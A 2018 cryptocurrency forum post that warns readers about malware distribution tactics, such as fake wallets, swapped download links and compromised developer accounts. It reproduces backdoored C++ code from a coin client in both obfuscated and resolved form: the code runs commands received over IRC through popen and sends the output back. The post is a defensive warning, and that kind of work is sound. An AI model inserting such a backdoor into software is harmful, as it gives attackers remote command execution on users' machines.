follow us on twitter . like us on facebook . follow us on instagram . subscribe to our youtube channel . announcements on telegram channel . ask urgent question ONLY . Subscribe to our reddit . Altcoins Talks Shop Shop


This is an Ad. Advertised sites are not endorsement by our Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise Here

Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 538 times)

Offline abdmuiz

  • Sr. Member
  • *
  • Activity: 631
  • points:
    9430
  • Karma: -3
  • Trade Count: (0)
  • Referrals: 0
  • Last Active: November 21, 2020, 09:51:04 AM
    • View Profile

  • Total Badges: 18
    Badges: (View All)
    10 Posts First Post Sixth year Anniversary
Beware of Increasingly Sophisticated Malware Infection Attempts
« on: January 25, 2018, 06:35:07 AM »
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
   CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      CFree(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
   }
}

here is the source code with macros resolved:
Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
   FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
   if (buf) {
      std::string result = "";
      while (!feof(buf))
         if (fgets(pszName, sizeof(pszName), buf) != NULL)
            result += pszName;
      pclose(buf);
      strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
      if (strchr(pszName, '!'))
         *strchr(pszName, '!') = '\0';
      Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
   }
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
   
It is pitch black. You are likely to be eaten by a grue.

Tired of annoying signature ads? Ad block for signatures

▄▄▄████████▄▄▄
▄███████████████████▄▄
▄▄████████████████████████▄
█████████████████████████████▄
▄███████████████▀▀▀▀▀▀▀██████████▄
▄████▀  █████▀▀           ▀████████▄
▄█████   ████    ▄▄█████▄▄   ▀███████
██████   ███   ▄███████████▄   ███████
██████   ██   ██████████████▄  ▀██████
███████   ██   ███████████████   ██████
███████   ██   ████████████▀██   ██████
██████   ██   ▀██████████▄     ▄██████
██████   ███   ▀███████  ▀▀    ███████
▀█████   ████▄    ▀▀▀▀▀▀     ▄  ▀████
▀████▄▄▄██████▄▄            ▀█▄████
▀█████████████████▄▄█████▄▄▄█████
▀████████████████████████████▀
▀████████████████████████▀
▀▀██████████████████▀
▀▀▀▀█████▀▀▀▀

cash

THE MASTERNODES
CRYPTOCURRENCY
   
 
 
   
Discovering millionaires’
secret with IQ.cash
   
            ▄███▄▄▄▄       ▄█▄
    ▄██   ▄███████▀▀      ▄████▄   ▄██▄
   ▀█▀  ████████▀         ███████▄ ▀██▀
      ▄██████▀           ▀█████████▄
    ▄██████▀               ▀█████████▄
   ▄█████▀ ▄██▄             ▀██████████▄
  █████▀    ▀███▄        ▄██▄ ▀███████▀
 █████        ▀███▄    ▄███▀    ▀███▀
▄███▀           ▀██▀ ▄███▀        ▀
███                ▄███▀
██               ▄███▀  ▄
▀              ▄███▀   ███▄
             ▄███▀      ▀███▄
           ▄███▀          ▀███▄
         ▄████              ▀███▄
        ████▀                ▀████
 
IQ.cash splits its block reward 57% to
Masternodes (ROI 380%), 43% to Miners
and 6% is reserved for Best Traders
project or IQ ecosystem (DAO)

   

Altcoins Talks - Cryptocurrency Forum

Beware of Increasingly Sophisticated Malware Infection Attempts
« on: January 25, 2018, 06:35:07 AM »

This is an Ad. Advertised sites are not endorsement by our Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise Here


 

ETH & ERC20 Tokens Donations: 0x2143F7146F0AadC0F9d85ea98F23273Da0e002Ab
BNB & BEP20 Tokens Donations: 0xcbDAB774B5659cB905d4db5487F9e2057b96147F
BTC Donations: bc1qjf99wr3dz9jn9fr43q28x0r50zeyxewcq8swng
BTC Tips for Moderators: 1Pz1S3d4Aiq7QE4m3MmuoUPEvKaAYbZRoG
Powered by SMFPacks Social Login Mod